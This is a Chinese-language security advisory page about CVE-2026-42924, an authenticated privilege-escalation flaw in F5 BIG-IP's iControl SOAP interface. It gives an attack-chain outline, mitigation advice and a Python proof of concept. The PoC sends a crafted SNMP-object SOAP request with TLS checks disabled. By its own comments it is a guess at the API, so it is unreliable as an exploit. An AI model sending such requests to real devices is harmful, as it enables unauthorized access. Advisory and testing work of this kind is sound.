IPBUF安全漏洞报告
English
CVE-2026-42924 CVSS 8.7 高危

CVE-2026-42924 F5 BIG-IP权限提升漏洞

披露日期: 2026-05-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-42924
漏洞类型
权限提升
CVSS评分
8.7 高危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
F5 BIG-IP

相关标签

权限提升F5BIG-IPiControl SOAPSNMPCVE-2026-42924

漏洞概述

F5 BIG-IP产品中存在一个安全漏洞,该漏洞与iControl SOAP接口处理配置对象的方式有关。具有资源管理员或管理员角色的经过身份验证的攻击者,可以通过iControl SOAP接口创建SNMP配置对象。由于系统在处理此类操作时存在逻辑缺陷,攻击者可利用此机制进行权限提升,从而获得比预期更高的系统权限。该漏洞对系统的机密性和完整性构成严重影响,但不会影响可用性。官方指出,已达到技术支持终止(EoTS)的软件版本不在受评估范围内。

技术细节

该漏洞的核心在于F5 BIG-IP的iControl SOAP接口未能正确隔离特定角色的操作权限。iControl SOAP是F5提供用于管理系统的API接口。正常情况下,资源管理员角色应仅限于特定资源的配置。然而,通过构造特殊的SOAP请求,攻击者可以调用创建SNMP配置对象的功能。在处理这些请求时,系统未能充分验证调用者的上下文权限,允许将操作权限扩展到系统层面。攻击者利用这一漏洞,可以在维持高权限账号(Resource Admin或Admin)会话的同时,通过创建恶意SNMP对象来执行超出其角色范围的命令或访问敏感数据,从而实现从管理员到系统更高权限的垂直提权。由于是网络攻击向量且无需用户交互,该漏洞具有较高的可利用性。

攻击链分析

STEP 1
步骤1:信息收集与认证
攻击者识别目标为F5 BIG-IP设备,并通过钓鱼、暴力破解或利用其他漏洞获取Resource Administrator或Administrator角色的凭证。
STEP 2
步骤2:构造恶意SOAP请求
攻击者利用获取的凭证,构造特制的iControl SOAP请求数据包,该数据包旨在创建SNMP配置对象,其中包含利用权限验证逻辑缺陷的参数。
STEP 3
步骤3:发送漏洞利用请求
攻击者通过网络将恶意SOAP请求发送至F5 BIG-IP的iControl接口(通常是443端口)。
STEP 4
步骤4:权限提升
目标系统处理请求时,由于未能正确隔离权限,允许攻击者成功创建配置对象并获得比预期更高的系统权限,进而可能访问敏感数据或修改系统配置。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 """ Conceptual Proof of Concept for CVE-2026-42924 Vulnerability: F5 BIG-IP iControl SOAP Privilege Escalation Description: This script demonstrates how an authenticated attacker might send a malicious SOAP request to create an SNMP configuration object. Note: For educational and authorized testing purposes only. """ import requests import xml.etree.ElementTree as ET # Target configuration TARGET_HOST = "https://<target-big-ip-ip>:443" USERNAME = "resource_admin" PASSWORD = "password" # iControl SOAP endpoint typically used for management SOAP_ENDPOINT = "/iControl/iControlPortal.cgi" def create_snmp_object_via_soap(): """ Sends a crafted SOAP request to create SNMP objects attempting privilege escalation. """ # Constructing the SOAP envelope # The specific method and namespace would depend on the exact iControl API version soap_headers = { 'Content-Type': 'text/xml; charset=utf-8', 'SOAPAction': '"urn:iControl:Management/SNMPConfiguration/create_object"' } # Malicious payload structure soap_body = f"""<?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:iControl:Management/SNMPConfiguration"> <SOAP-ENV:Header> <ns1:AuthHeader> <ns1:Username>{USERNAME}</ns1:Username> <ns1:Password>{PASSWORD}</ns1:Password> </ns1:AuthHeader> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:create_object> <!-- Manipulating SNMP object parameters to trigger escalation --> <ns1:snmp_configs> <ns1:oid>1.3.6.1.4.1.3375.2.100.1.2.9</ns1:oid> <ns1:community>public</ns1:community> <ns1:version>v2c</ns1:version> <!-- Injecting malicious configuration to exploit the logic flaw --> <ns1:allowed_addresses>0.0.0.0/0</ns1:allowed_addresses> </ns1:snmp_configs> </ns1:create_object> </SOAP-ENV:Body> </SOAP-ENV:Envelope> """ try: # Disable SSL verification warnings for testing (not recommended for prod) requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) print(f"[*] Sending exploit request to {TARGET_HOST}...") response = requests.post( f"{TARGET_HOST}{SOAP_ENDPOINT}", data=soap_body, headers=soap_headers, verify=False, timeout=10 ) if response.status_code == 200: print("[+] Request sent successfully. Check if privileges were escalated.") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": print("CVE-2026-42924 PoC - F5 BIG-IP iControl SOAP Privilege Escalation") create_snmp_object_via_soap()

影响范围

F5 BIG-IP (所有受支持版本,具体请参考官方公告K000160926)

防御指南

临时缓解措施
如果不便立即升级,建议禁用非必要的iControl SOAP服务,或者在网络层面阻断对iControl接口的外部访问。同时,应加强账户安全策略,确保高权限账户的凭据不被泄露,并定期审计系统配置以防未授权的SNMP对象被创建。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表